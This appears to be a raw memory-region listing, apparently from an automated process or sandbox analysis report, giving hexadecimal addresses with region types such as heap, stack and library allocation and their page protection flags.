7FF000FA000
trusted library allocation
page execute and read and write
340000
heap
page read and write
76A4000
trusted library allocation
page read and write
845E000
trusted library allocation
page read and write
2B33000
trusted library allocation
page read and write
2A46000
heap
page read and write
240000
heap
page read and write
452000
heap
page read and write
39CC000
trusted library allocation
page read and write
30A8000
heap
page read and write
2324000
trusted library allocation
page read and write
3B10000
trusted library allocation
page read and write
442000
heap
page read and write
23B0000
trusted library allocation
page read and write
30AC000
heap
page read and write
8910000
trusted library allocation
page read and write
2FAB000
trusted library allocation
page read and write
3AEF000
trusted library allocation
page read and write
83CE000
trusted library allocation
page read and write
43A000
heap
page read and write
2ADD000
trusted library allocation
page read and write
3AEF000
trusted library allocation
page read and write
2F60000
trusted library allocation
page read and write
2F3E000
trusted library allocation
page read and write
2AB0000
trusted library allocation
page read and write
23F8000
trusted library allocation
page read and write
2E70000
trusted library allocation
page read and write
2B27000
trusted library allocation
page read and write
428000
heap
page read and write
3BB000
heap
page read and write
3250000
trusted library allocation
page read and write
76A4000
trusted library allocation
page read and write
2A4D000
trusted library allocation
page read and write
890D000
stack
page read and write
30DA000
heap
page read and write
2E2B000
trusted library allocation
page read and write
394000
trusted library allocation
page read and write
3003000
heap
page read and write
3C3C000
stack
page read and write
2C4D000
trusted library allocation
page read and write
3093000
heap
page read and write
2303000
trusted library allocation
page read and write
300000
heap
page read and write
2FA5000
trusted library allocation
page read and write
2A4D000
trusted library allocation
page read and write
750000
heap
page read and write
42D000
heap
page read and write
7471000
heap
page read and write
23F1000
trusted library allocation
page read and write
3ADA000
trusted library allocation
page read and write
294000
heap
page read and write
CC0000
trusted library allocation
page read and write
1B875000
heap
page read and write
20A000
stack
page read and write
3154000
trusted library allocation
page read and write
76B0000
trusted library allocation
page read and write
774000
heap
page read and write
3A5D000
trusted library allocation
page read and write
1F00000
trusted library allocation
page read and write
4BF000
heap
page read and write
3BB000
heap
page read and write
23F8000
trusted library allocation
page read and write
3F0000
trusted library allocation
page read and write
2B38000
trusted library allocation
page read and write
2B3C000
trusted library allocation
page read and write
3A5D000
trusted library allocation
page read and write
10000
heap
page read and write
83CE000
trusted library allocation
page read and write
10000
heap
page read and write
76B0000
trusted library allocation
page read and write
1F00000
trusted library allocation
page read and write
30AA000
heap
page read and write
43F000
heap
page read and write
CB000
stack
page read and write
304C000
heap
page read and write
4AC000
heap
page read and write
3A1B000
trusted library allocation
page read and write
803000
heap
page read and write
49D000
heap
page read and write
2B29000
trusted library allocation
page read and write
884E000
trusted library allocation
page read and write
2284000
trusted library allocation
page read and write
1005A000
unkown
page readonly
2F28000
trusted library allocation
page read and write
2ADD000
trusted library allocation
page read and write
45A000
heap
page read and write
2DE0000
trusted library allocation
page read and write
1CA0D000
stack
page read and write
2E3E000
trusted library allocation
page read and write
280000
trusted library allocation
page read and write
444000
trusted library allocation
page read and write
30B1000
heap
page read and write
3A1B000
trusted library allocation
page read and write
3026000
heap
page read and write
1F00000
trusted library allocation
page read and write
2F04000
trusted library allocation
page read and write
3AC1000
trusted library allocation
page read and write
2414000
trusted library allocation
page read and write
263B000
heap
page read and write
2A57000
trusted library allocation
page read and write
3ADA000
trusted library allocation
page read and write
4B2000
heap
page read and write
7698000
trusted library allocation
page read and write
3033000
heap
page read and write
30A8000
heap
page read and write
2A53000
trusted library allocation
page read and write
4A3000
heap
page read and write
2417000
trusted library allocation
page read and write
29D0000
heap
page read and write
2C4B000
trusted library allocation
page read and write
394000
heap
page read and write
2DC000
heap
page read and write
76A4000
trusted library allocation
page read and write
3020000
heap
page read and write
B50000
heap
page read and write
271000
heap
page read and write
10053000
unkown
page read and write
231F000
trusted library allocation
page read and write
3070000
trusted library allocation
page read and write
2C6F000
trusted library allocation
page read and write
3AE2000
trusted library allocation
page read and write
3A5D000
trusted library allocation
page read and write
3546000
trusted library allocation
page read and write
10000000
unkown
page readonly
2A75000
trusted library allocation
page read and write
BD000
stack
page read and write
278E000
stack
page read and write
2C2000
trusted library section
page read and write
26C000
heap
page read and write
76B0000
trusted library allocation
page read and write
3095000
heap
page read and write
8910000
trusted library allocation
page read and write
1B51E000
stack
page read and write
30FE000
stack
page read and write
4AC000
heap
page read and write
7FF0025D000
trusted library allocation
page execute and read and write
77A000
heap
page read and write
414000
heap
page read and write
3AEF000
trusted library allocation
page read and write
543000
trusted library allocation
page read and write
2C1000
heap
page read and write
452000
heap
page read and write
12C11000
trusted library allocation
page read and write
22E0000
trusted library allocation
page read and write
230F000
trusted library allocation
page read and write
7FF0002A000
trusted library allocation
page execute and read and write
2230000
trusted library allocation
page read and write
3095000
heap
page read and write
818E000
trusted library allocation
page read and write
30AC000
heap
page read and write
9B3000
trusted library allocation
page read and write
210000
heap
page read and write
23F1000
trusted library allocation
page read and write
AE0000
heap
page read and write
2E93000
trusted library allocation
page read and write
2B38000
trusted library allocation
page read and write
91AE000
trusted library allocation
page read and write
388000
heap
page read and write
10057000
unkown
page read and write
76B0000
trusted library allocation
page read and write
3AE2000
trusted library allocation
page read and write
3A5D000
trusted library allocation
page read and write
2ADD000
trusted library allocation
page read and write
247E000
stack
page read and write
2B38000
trusted library allocation
page read and write
431000
heap
page read and write
30A2000
heap
page read and write
10046000
unkown
page readonly
2500000
trusted library allocation
page read and write
279000
heap
page read and write
7698000
trusted library allocation
page read and write
2B38000
trusted library allocation
page read and write
2FE4000
heap
page read and write
2414000
trusted library allocation
page read and write
2180000
heap
page read and write
4AC000
heap
page read and write
33E000
heap
page read and write
27C000
heap
page read and write
3A1B000
trusted library allocation
page read and write
30C4000
heap
page read and write
7FF00032000
trusted library allocation
page execute and read and write
16C000
stack
page read and write
2F8B000
trusted library allocation
page read and write
12D81000
trusted library allocation
page read and write
7470000
heap
page read and write
8910000
trusted library allocation
page read and write
3360000
heap
page read and write
A90000
heap
page read and write
2A58000
trusted library allocation
page read and write
370000
trusted library allocation
page read and write
3AC1000
trusted library allocation
page read and write
20BD000
stack
page read and write
3AB7000
trusted library allocation
page read and write
2C4D000
trusted library allocation
page read and write
8910000
trusted library allocation
page read and write
2414000
trusted library allocation
page read and write
3071000
heap
page read and write
10000000
unkown
page readonly
3ADA000
trusted library allocation
page read and write
2EDE000
stack
page read and write
2ED9000
trusted library allocation
page read and write
3144000
trusted library allocation
page read and write
210000
trusted library allocation
page read and write
544000
trusted library allocation
page read and write
3B4000
heap
page read and write
303E000
heap
page read and write
2A49000
trusted library allocation
page read and write
C60000
trusted library allocation
page read and write
2FCA000
trusted library allocation
page read and write
260000
heap
page read and write
10000000
unkown
page readonly
2303000
trusted library allocation
page read and write
950000
heap
page read and write
2417000
trusted library allocation
page read and write
23D4000
trusted library allocation
page read and write
30AF000
heap
page read and write
30E3000
trusted library allocation
page read and write
2ADD000
trusted library allocation
page read and write
2DC000
heap
page read and write
77D000
heap
page read and write
4968000
heap
page read and write
2E3E000
trusted library allocation
page read and write
30D7000
heap
page read and write
2A75000
trusted library allocation
page read and write
3AC1000
trusted library allocation
page read and write
4A3000
heap
page read and write
2C90000
heap
page read and write
2414000
trusted library allocation
page read and write
4A3000
heap
page read and write
2C60000
trusted library allocation
page read and write
1F00000
trusted library allocation
page read and write
2A57000
trusted library allocation
page read and write
2A75000
trusted library allocation
page read and write
2417000
trusted library allocation
page read and write
884E000
trusted library allocation
page read and write
28F0000
trusted library allocation
page read and write
3A5D000
trusted library allocation
page read and write
3AC1000
trusted library allocation
page read and write
294000
trusted library allocation
page read and write
1F00000
trusted library allocation
page read and write
C83000
trusted library allocation
page read and write
180000
heap
page read and write
D58000
heap
page read and write
7FF00290000
trusted library allocation
page execute and read and write
2F54000
trusted library allocation
page read and write
30A9000
trusted library allocation
page read and write
2E6E000
stack
page read and write
3A1B000
trusted library allocation
page read and write
2E5F000
trusted library allocation
page read and write
300D000
heap
page read and write
76B0000
trusted library allocation
page read and write
31B0000
trusted library allocation
page read and write
12C15000
trusted library allocation
page read and write
896E000
trusted library allocation
page read and write
8910000
trusted library allocation
page read and write
970000
heap
page read and write
301D000
heap
page read and write
1F00000
trusted library allocation
page read and write
2C4000
trusted library allocation
page read and write
2417000
trusted library allocation
page read and write
2DAD000
stack
page read and write
2ADD000
trusted library allocation
page read and write
10000
heap
page read and write
3A5D000
trusted library allocation
page read and write
2A57000
trusted library allocation
page read and write
76A4000
trusted library allocation
page read and write
2417000
trusted library allocation
page read and write
30AA000
heap
page read and write
76B0000
trusted library allocation
page read and write
2F77000
trusted library allocation
page read and write
1005A000
unkown
page readonly
2EC000
stack
page read and write
2330000
heap
page read and write
3AB1000
trusted library allocation
page read and write
430000
heap
page read and write
2414000
trusted library allocation
page read and write
4A8000
heap
page read and write
30C4000
heap
page read and write
3A5D000
trusted library allocation
page read and write
3A1B000
trusted library allocation
page read and write
393000
trusted library allocation
page read and write
301D000
heap
page read and write
1E7F000
stack
page read and write
2A47000
trusted library allocation
page read and write
2F0F000
trusted library allocation
page read and write
1D0000
heap
page read and write
2E0000
trusted library allocation
page read and write
10000000
unkown
page readonly
828E000
trusted library allocation
page read and write
2B38000
trusted library allocation
page read and write
3AE2000
trusted library allocation
page read and write
3003000
heap
page read and write
2FF8000
heap
page read and write
180000
trusted library allocation
page read and write
3260000
heap
page read and write
2F4C000
stack
page read and write
3A5D000
trusted library allocation
page read and write
3A5D000
trusted library allocation
page read and write
7698000
trusted library allocation
page read and write
4B3000
heap
page read and write
2417000
trusted library allocation
page read and write
200000
heap
page read and write
2414000
trusted library allocation
page read and write
2F8F000
trusted library allocation
page read and write
2BF000
heap
page read and write
2E52000
trusted library allocation
page read and write
7EF97000
unkown
page read and write
300000
heap
page read and write
23F1000
trusted library allocation
page read and write
8910000
trusted library allocation
page read and write
23D4000
trusted library allocation
page read and write
2470000
trusted library allocation
page read and write
2414000
trusted library allocation
page read and write
2ADD000
trusted library allocation
page read and write
8910000
trusted library allocation
page read and write
2E7B000
trusted library allocation
page read and write
31E0000
trusted library allocation
page execute
2FA0000
trusted library allocation
page read and write
21A0000
heap
page read and write
25F000
heap
page read and write
3AC1000
trusted library allocation
page read and write
3A8000
heap
page read and write
3A5D000
trusted library allocation
page read and write
2414000
trusted library allocation
page read and write
2A75000
trusted library allocation
page read and write
2C4D000
trusted library allocation
page read and write
1E80000
heap
page execute and read and write
520000
trusted library allocation
page read and write
4BD000
heap
page read and write
23F1000
trusted library allocation
page read and write
2320000
heap
page read and write
370000
heap
page read and write
22E0000
trusted library allocation
page read and write
2417000
trusted library allocation
page read and write
8910000
trusted library allocation
page read and write
3517000
trusted library allocation
page read and write
304D000
heap
page read and write
1005A000
unkown
page readonly
14C000
stack
page read and write
2A0000
trusted library allocation
page read and write
7698000
trusted library allocation
page read and write
2A57000
trusted library allocation
page read and write
2C4D000
trusted library allocation
page read and write
2DB000
heap
page read and write
76A4000
trusted library allocation
page read and write
E86E000
trusted library allocation
page read and write
4946000
heap
page read and write
3003000
heap
page read and write
3033000
heap
page read and write
22E0000
trusted library allocation
page read and write
3071000
heap
page read and write
28DE000
stack
page read and write
3250000
trusted library allocation
page read and write
3AC1000
trusted library allocation
page read and write
2ADD000
trusted library allocation
page read and write
7FFFFF00000
trusted library allocation
page execute and read and write
3AC1000
trusted library allocation
page read and write
3AD8000
trusted library allocation
page read and write
2414000
trusted library allocation
page read and write
3A5D000
trusted library allocation
page read and write
30B5000
heap
page read and write
2A57000
trusted library allocation
page read and write
3B10000
trusted library allocation
page read and write
3A5D000
trusted library allocation
page read and write
10000000
unkown
page readonly
2EE0000
trusted library allocation
page read and write
30B5000
heap
page read and write
2A5F000
trusted library allocation
page read and write
2C11000
trusted library allocation
page read and write
2C00000
heap
page read and write
30EA000
trusted library allocation
page read and write
454000
trusted library allocation
page read and write
3533000
trusted library allocation
page read and write
2C40000
trusted library allocation
page read and write
1F00000
trusted library allocation
page read and write
3486000
trusted library allocation
page read and write
286D000
stack
page read and write
2A57000
trusted library allocation
page read and write
48A000
heap
page read and write
1C6CE000
stack
page read and write
2C4B000
trusted library allocation
page read and write
2C4D000
trusted library allocation
page read and write
34D8000
trusted library allocation
page read and write
2417000
trusted library allocation
page read and write
4B4000
heap
page read and write
3AEF000
trusted library allocation
page read and write
23F1000
trusted library allocation
page read and write
2F2E000
stack
page read and write
28F0000
trusted library allocation
page read and write
2332000
heap
page read and write
C80000
heap
page read and write
3A1B000
trusted library allocation
page read and write
25EF000
trusted library section
page readonly
4B1000
heap
page read and write
2F0E000
stack
page read and write
2283000
trusted library allocation
page read and write
74AA000
heap
page read and write
2230000
trusted library allocation
page read and write
23F8000
trusted library allocation
page read and write
2C4B000
trusted library allocation
page read and write
22D0000
heap
page read and write
409000
heap
page read and write
3AB2000
trusted library allocation
page read and write
3AC1000
trusted library allocation
page read and write
540000
heap
page read and write
3AEF000
trusted library allocation
page read and write
2DC000
heap
page read and write
788000
heap
page read and write
3EBA000
stack
page read and write
2440000
trusted library allocation
page read and write
CE4000
trusted library allocation
page read and write
3ABB000
trusted library allocation
page read and write
30A2000
heap
page read and write
30D7000
heap
page read and write
2ADD000
trusted library allocation
page read and write
1C20000
heap
page read and write
2414000
trusted library allocation
page read and write
400000
heap
page read and write
4BF000
heap
page read and write
2F60000
trusted library allocation
page read and write
20000
heap
page read and write
4BC000
heap
page read and write
30B5000
heap
page read and write
2A75000
trusted library allocation
page read and write
2BF000
heap
page read and write
39B1000
trusted library allocation
page read and write
271000
heap
page read and write
2A45000
trusted library allocation
page read and write
76A4000
trusted library allocation
page read and write
2A5E000
trusted library allocation
page read and write
2A5D000
trusted library allocation
page read and write
25E4000
trusted library section
page readonly
2C0000
heap
page read and write
3033000
heap
page read and write
2ADD000
trusted library allocation
page read and write
2A4A000
trusted library allocation
page read and write
2A5A000
trusted library allocation
page read and write
3AEF000
trusted library allocation
page read and write
3097000
heap
page read and write
32AE000
unkown
page read and write
2C45000
trusted library allocation
page read and write
8D5E000
trusted library allocation
page read and write
10046000
unkown
page readonly
3400000
trusted library allocation
page read and write
2F5E000
stack
page read and write
2B38000
trusted library allocation
page read and write
3021000
heap
page read and write
314B000
trusted library allocation
page read and write
2C4D000
trusted library allocation
page read and write
3AB4000
trusted library allocation
page read and write
76A4000
trusted library allocation
page read and write
23F1000
trusted library allocation
page read and write
2A10000
heap
page read and write
2E00000
trusted library allocation
page read and write
E86E000
trusted library allocation
page read and write
10000
heap
page read and write
3097000
heap
page read and write
8910000
unkown
page read and write
2417000
trusted library allocation
page read and write
3412000
trusted library allocation
page read and write
1D4000
heap
page read and write
3A1B000
trusted library allocation
page read and write
309C000
heap
page read and write
2414000
trusted library allocation
page read and write
2417000
trusted library allocation
page read and write
74B5000
heap
page read and write
23F1000
trusted library allocation
page read and write
7FF001F7000
trusted library allocation
page read and write
2ADD000
trusted library allocation
page read and write
3001000
heap
page read and write
2417000
trusted library allocation
page read and write
22E0000
trusted library allocation
page read and write
7698000
trusted library allocation
page read and write
351A000
trusted library allocation
page read and write
2450000
heap
page read and write
3130000
trusted library allocation
page read and write
10000
heap
page read and write
3A5D000
trusted library allocation
page read and write
2B38000
trusted library allocation
page read and write
76B0000
trusted library allocation
page read and write
400000
heap
page read and write
352A000
trusted library allocation
page read and write
23C4000
trusted library allocation
page read and write
292D000
stack
page read and write
747000
heap
page read and write
2AD3000
trusted library allocation
page read and write
27E4000
heap
page read and write
2414000
trusted library allocation
page read and write
3A5D000
trusted library allocation
page read and write
265000
heap
page read and write
1F00000
trusted library allocation
page read and write
76A4000
trusted library allocation
page read and write
1F00000
trusted library allocation
page read and write
1005A000
unkown
page readonly
23F1000
trusted library allocation
page read and write
3A5D000
trusted library allocation
page read and write
3035000
heap
page read and write
799000
heap
page read and write
3093000
heap
page read and write
2414000
trusted library allocation
page read and write
265000
heap
page read and write
3007000
heap
page read and write
3AE2000
trusted library allocation
page read and write
306E000
stack
page read and write
23D4000
trusted library allocation
page read and write
2EE5000
trusted library allocation
page read and write
4AB000
heap
page read and write
2440000
trusted library allocation
page read and write
330000
heap
page read and write
7698000
trusted library allocation
page read and write
1F00000
trusted library allocation
page read and write
2E3E000
trusted library allocation
page read and write
52A000
heap
page read and write
351D000
trusted library allocation
page read and write
22DC000
stack
page read and write
2A0000
heap
page read and write
828E000
trusted library allocation
page read and write
2E10000
trusted library allocation
page read and write
1C93E000
stack
page read and write
2414000
trusted library allocation
page read and write
452000
heap
page read and write
3F6000
heap
page read and write
76A4000
trusted library allocation
page read and write
2414000
trusted library allocation
page read and write
441000
heap
page read and write
268000
heap
page read and write
2A10000
trusted library allocation
page read and write
3050000
heap
page read and write
896E000
trusted library allocation
page read and write
1B404000
trusted library allocation
page read and write
23F1000
trusted library allocation
page read and write
2414000
trusted library allocation
page read and write
2B34000
trusted library allocation
page read and write
3130000
trusted library allocation
page read and write
2A45000
trusted library allocation
page read and write
2802000
heap
page read and write
30AE000
heap
page read and write
43A000
heap
page read and write
2414000
trusted library allocation
page read and write
7698000
trusted library allocation
page read and write
2BF000
heap
page read and write
3A1B000
trusted library allocation
page read and write
7FF00270000
trusted library allocation
page read and write
2D1F000
stack
page read and write
2FA0000
trusted library allocation
page read and write
4A3000
heap
page read and write
12B000
stack
page read and write
BE0000
heap
page read and write
2BD0000
trusted library allocation
page read and write
3AC1000
trusted library allocation
page read and write
76B0000
trusted library allocation
page read and write
23F8000
trusted library allocation
page read and write
7698000
trusted library allocation
page read and write
C0000
heap
page read and write
2C4B000
trusted library allocation
page read and write
2D0000
trusted library section
page read and write
2490000
trusted library allocation
page read and write
2C1000
heap
page read and write
823E000
trusted library allocation
page read and write
76A4000
trusted library allocation
page read and write
7FF001C0000
trusted library allocation
page execute and read and write
2A4D000
trusted library allocation
page read and write
2A4B000
trusted library allocation
page read and write
7FF001A0000
trusted library allocation
page execute and read and write
3007000
heap
page read and write
2AD000
heap
page read and write
903E000
trusted library allocation
page read and write
28AE000
stack
page read and write
4A3000
heap
page read and write
2351000
trusted library allocation
page read and write
2A75000
trusted library allocation
page read and write
944000
trusted library allocation
page read and write
740000
heap
page read and write
2417000
trusted library allocation
page read and write
76A4000
trusted library allocation
page read and write
307B000
heap
page read and write
3AB9000
trusted library allocation
page read and write
3A1B000
trusted library allocation
page read and write
823E000
trusted library allocation
page read and write
7698000
trusted library allocation
page read and write
76A4000
trusted library allocation
page read and write
2A49000
trusted library allocation
page read and write
3DC000
heap
page read and write
45A000
heap
page read and write
3063000
heap
page read and write
7488000
heap
page read and write
270000
heap
page read and write
10057000
unkown
page read and write
2EFF000
trusted library allocation
page read and write
23D4000
trusted library allocation
page read and write
3190000
trusted library allocation
page read and write
460000
heap
page read and write
30B3000
heap
page read and write
3130000
trusted library allocation
page read and write
10046000
unkown
page readonly
24B3000
trusted library allocation
page read and write
3BE000
heap
page read and write
2ADD000
trusted library allocation
page read and write
890000
trusted library allocation
page read and write
2A57000
trusted library allocation
page read and write
23D3000
trusted library allocation
page read and write
7BA000
heap
page read and write
2E4C000
trusted library allocation
page read and write
2FCD000
trusted library allocation
page read and write
76B0000
trusted library allocation
page read and write
1005A000
unkown
page readonly
35A9000
trusted library allocation
page read and write
2A49000
trusted library allocation
page read and write
7FF000F5000
trusted library allocation
page read and write
498000
heap
page read and write
2F2E000
stack
page read and write
10053000
unkown
page read and write
30A2000
heap
page read and write
2C4D000
trusted library allocation
page read and write
2F0000
trusted library allocation
page read and write
30AA000
heap
page read and write
2C4B000
trusted library allocation
page read and write
2490000
trusted library allocation
page read and write
7698000
trusted library allocation
page read and write
2F9F000
trusted library allocation
page read and write
2C4B000
trusted library allocation
page read and write
7FF00180000
trusted library allocation
page execute and read and write
3AD8000
trusted library allocation
page read and write
30AE000
trusted library allocation
page read and write
2490000
trusted library allocation
page read and write
2FE5000
heap
page read and write
23F8000
trusted library allocation
page read and write
25F000
heap
page read and write
76B0000
trusted library allocation
page read and write
2417000
trusted library allocation
page read and write
1B840000
heap
page read and write
76B0000
trusted library allocation
page read and write
E86E000
trusted library allocation
page read and write
2820000
trusted library allocation
page read and write
27E0000
heap
page read and write
10046000
unkown
page readonly
307A000
heap
page read and write
3AEF000
trusted library allocation
page read and write
8D5E000
trusted library allocation
page read and write
2A52000
trusted library allocation
page read and write
1A3000
trusted library allocation
page read and write
3AEF000
trusted library allocation
page read and write
2EFB000
trusted library allocation
page read and write
2414000
trusted library allocation
page read and write
2E3E000
trusted library allocation
page read and write
7FF000E2000
trusted library allocation
page execute and read and write
26C000
heap
page read and write
9B0000
heap
page read and write
2F60000
heap
page read and write
3A5D000
trusted library allocation
page read and write
3A1B000
trusted library allocation
page read and write
24B4000
trusted library allocation
page read and write
2E3E000
trusted library allocation
page read and write
3099000
heap
page read and write
2B38000
trusted library allocation
page read and write
4930000
heap
page read and write
30B3000
heap
page read and write
210B000
heap
page read and write
2540000
trusted library allocation
page read and write
7698000
trusted library allocation
page read and write
30A2000
heap
page read and write
4F0000
heap
page read and write
76A4000
trusted library allocation
page read and write
23F8000
trusted library allocation
page read and write
170000
heap
page read and write
43A000
heap
page read and write
2417000
trusted library allocation
page read and write
3A1B000
trusted library allocation
page read and write
7FF002A0000
trusted library allocation
page execute and read and write
87BE000
trusted library allocation
page read and write
3A5D000
trusted library allocation
page read and write
910E000
trusted library allocation
page read and write
1B400000
trusted library allocation
page read and write
1F00000
trusted library allocation
page read and write
24D4000
heap
page read and write
2E3E000
trusted library allocation
page read and write
2A75000
trusted library allocation
page read and write
7FF00160000
trusted library allocation
page read and write
2417000
trusted library allocation
page read and write
3095000
heap
page read and write
2760000
trusted library allocation
page read and write
299A000
heap
page execute and read and write
26C000
heap
page read and write
413000
heap
page read and write
31DB000
stack
page read and write
76B0000
trusted library allocation
page read and write
1E0000
trusted library allocation
page read and write
2E71000
trusted library allocation
page read and write
308E000
stack
page read and write
420000
trusted library allocation
page read and write
37AD000
trusted library allocation
page read and write
22E0000
trusted library allocation
page read and write
7488000
heap
page read and write
30D8000
heap
page read and write
23F1000
trusted library allocation
page read and write
7698000
trusted library allocation
page read and write
9FC000
stack
page read and write
1F00000
trusted library allocation
page read and write
2A4D000
trusted library allocation
page read and write
2B38000
trusted library allocation
page read and write
4AC000
heap
page read and write
3ADA000
trusted library allocation
page read and write
2B21000
trusted library allocation
page read and write
23F8000
trusted library allocation
page read and write
3F7000
heap
page read and write
2FAE000
stack
page read and write
237C000
stack
page read and write
9E0000
heap
page read and write
408000
heap
page read and write
2414000
trusted library allocation
page read and write
4CD9000
heap
page read and write
39BD000
trusted library allocation
page read and write
230000
heap
page read and write
3AEF000
trusted library allocation
page read and write
3744000
trusted library allocation
page read and write
76A4000
trusted library allocation
page read and write
1B89A000
heap
page read and write
4945000
heap
page read and write
3F0000
heap
page read and write
1E0000
heap
page read and write
312E000
stack
page read and write
1F0000
heap
page read and write
28F0000
trusted library allocation
page read and write
3033000
heap
page read and write
764000
heap
page read and write
884E000
trusted library allocation
page read and write
30B1000
heap
page read and write
76B0000
trusted library allocation
page read and write
270000
trusted library allocation
page read and write
3AC1000
trusted library allocation
page read and write
3ADA000
trusted library allocation
page read and write
29F2000
heap
page read and write
3AB8000
trusted library allocation
page read and write
2F7D000
trusted library allocation
page read and write
1005A000
unkown
page readonly
90EE000
trusted library allocation
page read and write
2B26000
trusted library allocation
page read and write
3AE2000
trusted library allocation
page read and write
31E4000
trusted library allocation
page execute
2F53000
trusted library allocation
page read and write
3151000
trusted library allocation
page read and write
76A4000
trusted library allocation
page read and write
4AC000
heap
page read and write
30A2000
heap
page read and write
30B1000
heap
page read and write
2360000
trusted library allocation
page read and write
3047000
heap
page read and write
76B0000
trusted library allocation
page read and write
494C000
heap
page read and write
3ABC000
trusted library allocation
page read and write
20D5000
heap
page read and write
430000
trusted library allocation
page read and write
4BC000
heap
page read and write
2030000
trusted library allocation
page read and write
23F1000
trusted library allocation
page read and write
2B34000
trusted library allocation
page read and write
E86E000
trusted library allocation
page read and write
309C000
heap
page read and write
7FF00210000
trusted library allocation
page execute and read and write
2417000
trusted library allocation
page read and write
849E000
trusted library allocation
page read and write
2ADD000
trusted library allocation
page read and write
3A0000
trusted library allocation
page read and write
3063000
heap
page read and write
30AF000
heap
page read and write
445000
heap
page read and write
7485000
heap
page read and write
3A5D000
trusted library allocation
page read and write
270000
heap
page read and write
8EBE000
trusted library allocation
page read and write
445000
heap
page read and write
2A5C000
trusted library allocation
page read and write
2A40000
trusted library allocation
page read and write
9B4000
trusted library allocation
page read and write
CE3000
trusted library allocation
page read and write
1F00000
trusted library allocation
page read and write
3AC1000
trusted library allocation
page read and write
4945000
heap
page read and write
2414000
trusted library allocation
page read and write
2B3E000
trusted library allocation
page read and write
2D20000
trusted library allocation
page read and write
2ADD000
trusted library allocation
page read and write
2B25000
trusted library allocation
page read and write
30C4000
heap
page read and write
2338000
trusted library allocation
page read and write
1B40A000
trusted library allocation
page read and write
30AE000
heap
page read and write
30B7000
heap
page read and write
839E000
trusted library allocation
page read and write
2FA0000
trusted library allocation
page read and write
76B0000
trusted library allocation
page read and write
2414000
trusted library allocation
page read and write
2417000
trusted library allocation
page read and write
1B87B000
heap
page read and write
7476000
heap
page read and write
2A59000
trusted library allocation
page read and write
1F00000
trusted library allocation
page read and write
300D000
heap
page read and write
A4D000
stack
page read and write
2E50000
heap
page read and write
2414000
trusted library allocation
page read and write
2C63000
trusted library allocation
page read and write
23F8000
trusted library allocation
page read and write
2417000
trusted library allocation
page read and write
E86E000
trusted library allocation
page read and write
26C000
stack
page read and write
2B0000
heap
page read and write
23D4000
trusted library allocation
page read and write
23F8000
trusted library allocation
page read and write
8FCE000
trusted library allocation
page read and write
2B3F000
trusted library allocation
page read and write
2417000
trusted library allocation
page read and write
74D000
heap
page read and write
29F0000
trusted library allocation
page read and write
3AEF000
trusted library allocation
page read and write
2F0000
heap
page read and write
33E0000
trusted library allocation
page read and write
2B23000
trusted library allocation
page read and write
495F000
heap
page read and write
23D4000
trusted library allocation
page read and write
27C000
heap
page read and write
24C000
heap
page read and write
7FF00122000
trusted library allocation
page execute and read and write
3A1B000
trusted library allocation
page read and write
884E000
trusted library allocation
page read and write
10053000
unkown
page read and write
445000
heap
page read and write
10000
heap
page read and write
903E000
trusted library allocation
page read and write
443000
trusted library allocation
page read and write
2414000
trusted library allocation
page read and write
3AD8000
trusted library allocation
page read and write
2E7E000
trusted library allocation
page read and write
7FF00250000
trusted library allocation
page execute and read and write
10000
heap
page read and write
30DA000
heap
page read and write
1DD000
stack
page read and write
352D000
trusted library allocation
page read and write
8EFE000
trusted library allocation
page read and write
1F00000
trusted library allocation
page read and write
930000
heap
page read and write
268000
heap
page read and write
270000
heap
page read and write
1005A000
unkown
page readonly
2FB1000
trusted library allocation
page read and write
3004000
heap
page read and write
2E3E000
trusted library allocation
page read and write
289F000
stack
page read and write
3549000
trusted library allocation
page read and write
2B10000
trusted library allocation
page read and write
3190000
trusted library allocation
page read and write
8910000
trusted library allocation
page read and write
717000
heap
page read and write
155000
stack
page read and write | page guard
390000
trusted library allocation
page read and write
308000
heap
page read and write
3A1B000
trusted library allocation
page read and write
3ABA000
trusted library allocation
page read and write
45A000
heap
page read and write
7AA000
heap
page read and write
2ADD000
trusted library allocation
page read and write
7698000
trusted library allocation
page read and write
4963000
heap
page read and write
2A14000
trusted library allocation
page read and write
7B0000
heap
page read and write
2341000
trusted library allocation
page read and write
2F0B000
trusted library allocation
page read and write
3ADA000
trusted library allocation
page read and write
22FD000
trusted library allocation
page read and write
1B2E0000
heap
page read and write
3C0000
heap
page read and write
2C3D000
stack
page read and write
3F8000
heap
page read and write
2417000
trusted library allocation
page read and write
908E000
trusted library allocation
page read and write
438000
heap
page read and write
18C000
stack
page read and write
87BE000
trusted library allocation
page read and write
2F60000
trusted library allocation
page read and write
12C3C000
trusted library allocation
page read and write
3AB5000
trusted library allocation
page read and write
8910000
trusted library allocation
page read and write
3A1B000
trusted library allocation
page read and write
31B8000
trusted library allocation
page read and write
3093000
heap
page read and write
2A5B000
trusted library allocation
page read and write
D2F000
stack
page read and write
3037000
heap
page read and write
4B10000
trusted library allocation
page read and write
8C7E000
trusted library allocation
page read and write
30B3000
heap
page read and write
3131000
trusted library allocation
page read and write
2F59000
trusted library allocation
page read and write
AC000
stack
page read and write
76B0000
trusted library allocation
page read and write
23D4000
trusted library allocation
page read and write
439000
heap
page read and write
30D7000
heap
page read and write
2330000
trusted library allocation
page read and write
2E94000
trusted library allocation
page read and write
3063000
heap
page read and write
10053000
unkown
page read and write
4CD5000
heap
page read and write
2B24000
trusted library allocation
page read and write
2DEE000
stack
page read and write
4966000
heap
page read and write
30E4000
trusted library allocation
page read and write
3C0000
heap
page read and write
76B0000
trusted library allocation
page read and write
3AE2000
trusted library allocation
page read and write
3220000
trusted library allocation
page read and write
2C64000
trusted library allocation
page read and write
1A4000
trusted library allocation
page read and write
2E3E000
trusted library allocation
page read and write
30B3000
heap
page read and write
E86E000
trusted library allocation
page read and write
2A75000
trusted library allocation
page read and write
314E000
trusted library allocation
page read and write
76B0000
trusted library allocation
page read and write
3000000
heap
page read and write
7698000
trusted library allocation
page read and write
277000
heap
page read and write
2414000
trusted library allocation
page read and write
2417000
trusted library allocation
page read and write
10057000
unkown
page read and write
2414000
trusted library allocation
page read and write
2BEE000
stack
page read and write
4B1000
heap
page read and write
10053000
unkown
page read and write
2417000
trusted library allocation
page read and write
7698000
trusted library allocation
page read and write
2FAE000
trusted library allocation
page read and write
2A57000
trusted library allocation
page read and write
A50000
heap
page read and write
3048000
heap
page read and write
8D3E000
trusted library allocation
page read and write
2470000
trusted library allocation
page read and write
23D4000
trusted library allocation
page read and write
2AD4000
trusted library allocation
page read and write
4A4000
heap
page read and write
2F9E000
stack
page read and write
2A43000
trusted library allocation
page read and write
30AA000
heap
page read and write
220000
trusted library allocation
page read and write
2ADD000
trusted library allocation
page read and write
